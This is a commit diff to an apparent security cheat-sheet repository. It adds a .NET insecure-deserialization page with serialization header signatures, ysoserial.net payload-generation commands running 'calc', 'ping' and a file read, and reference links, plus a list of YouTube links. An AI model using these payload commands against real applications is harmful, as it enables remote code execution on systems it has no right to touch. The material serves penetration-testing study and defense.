.NET Deserialization

Insecure Deserialization/DotNET.md

@@ -0,0 +1,48 @@
+# .NET Serialization
+
+## Summary
+
+* [Detection](#detection)
+* [Exploit](#exploit)
+* [References](#references)
+
+
+## Detection
+
+* `AAEAAD` (Hex) = .NET deserialization BinaryFormatter
+* `FF01` (Hex) / `/w` (Base64) = .NET ViewState
+
+Example: `AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0u[...]0KPC9PYmpzPgs=`
+
+
+## Exploit
+
+* [pwntester/ysoserial.net - Deserialization payload generator for a variety of .NET formatters](https://github.com/pwntester/ysoserial.net)
+```ps1
+$ cat my_long_cmd.txt | ysoserial.exe -o raw -g WindowsIdentity -f Json.Net -s
+$ ./ysoserial.exe -p DotNetNuke -m read_file -f win.ini
+$ ./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t
+$ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
+```
+
+### JSON.NET
+
+```ps1
+./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "ping 10.10.10.10" -t
+```
+
+### BinaryFormatter
+
+> The BinaryFormatter type is dangerous and is not recommended for data processing. Applications should stop using BinaryFormatter as soon as possible, even if they believe the data they’re processing to be trustworthy. BinaryFormatter is insecure and can’t be made secure.
+
+
+```ps1
+./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "ping 10.10.10.10" -t
+```
+
+
+## References
+
+* [Attacking .NET deserialization - Alvaro Muñoz - 28 avr. 2018](https://youtu.be/eDfGpu3iE4Q)
+* [Now You Serial, Now You Don't - Systematically Hunting for Deserialization Exploits - ALYSSA RAHMANDEC](https://www.mandiant.com/resources/blog/hunting-deserialization-exploits)
+* [Exploiting Deserialisation in ASP.NET via ViewState - Soroush Dalili (@irsdl) - 04/2019](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)

Insecure Deserialization/README.md

@@ -9,15 +9,24 @@ Check the following sub-sections, located in other files :
 * [Ruby : universal rce gadget, ...](Ruby.md)
 * [Python : pickle, ...](Python.md)
 * [YAML : PyYAML, ...](YAML.md)
+* [.NET : ysoserial.net, ...](DotNET.md)
+
+| Object Type     | Header (Hex) | Header (Base64) |
+|-----------------|--------------|-----------------|
+| Java Serialized | AC ED        | rO              |
+| .NET ViewState  | FF 01        | /w              |
+| Python Pickle   | 80 04 95     | gASV            |
+| PHP Serialized  | 4F 3A        | Tz              |
+
 
 ## LABS
 
 * [Insecure Deserialization 10 labs](https://portswigger.net/web-security/all-labs#insecure-deserialization)
 
 ## References
 
-* [Github - ysoserial](https://github.com/frohoff/ysoserial)
-* [Github - ysoserial.net](https://github.com/pwntester/ysoserial.net)
+* [Github - frohoff/ysoserial](https://github.com/frohoff/ysoserial)
+* [Github - pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net)
 * [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
 * [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
 * [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
@@ -33,4 +42,5 @@ Check the following sub-sections, located in other files :
 * [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals
 * [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e)
 * [.NET Gadgets](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) by Alvaro Muñoz (@pwntester) & OleksandrMirosh
-* [ExploitDB Introduction](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf)
+* [ExploitDB Introduction](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf)
+* [Exploiting insecure deserialization vulnerabilities - PortSwigger](https://portswigger.net/web-security/deserialization/exploiting)

_LEARNING_AND_SOCIALS/YOUTUBE.md

@@ -19,6 +19,14 @@
 - [stacksmashing / Ghidra Ninja](https://www.youtube.com/channel/UC3S8vxwRfqLBdIhgRlDRVzw)
 - [Hak5](https://www.youtube.com/channel/UC3s0BtrBJpwNDaflRSoiieQ)
 
+- [HACKING GOOGLE Series](https://www.youtube.com/watch?v=aOGFY1R4QQ4)
+    - [EP000: Operation Aurora | HACKING GOOGLE](https://youtu.be/przDcQe6n5o)
+    - [EP001: Threat Analysis Group | HACKING GOOGLE](https://youtu.be/N7N4EC20-cM)
+    - [EP002: Detection and Response | HACKING GOOGLE](https://youtu.be/QZ0cpBocl3c)
+    - [EP003: Red Team | HACKING GOOGLE](https://youtu.be/TusQWn2TQxQ)
+    - [EP004: Bug Hunters | HACKING GOOGLE](https://youtu.be/IoXiXlCNoXg)
+    - [EP005: Project Zero | HACKING GOOGLE](https://youtu.be/My_13FXODdU)
+
 ## Conferences
 
 - [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)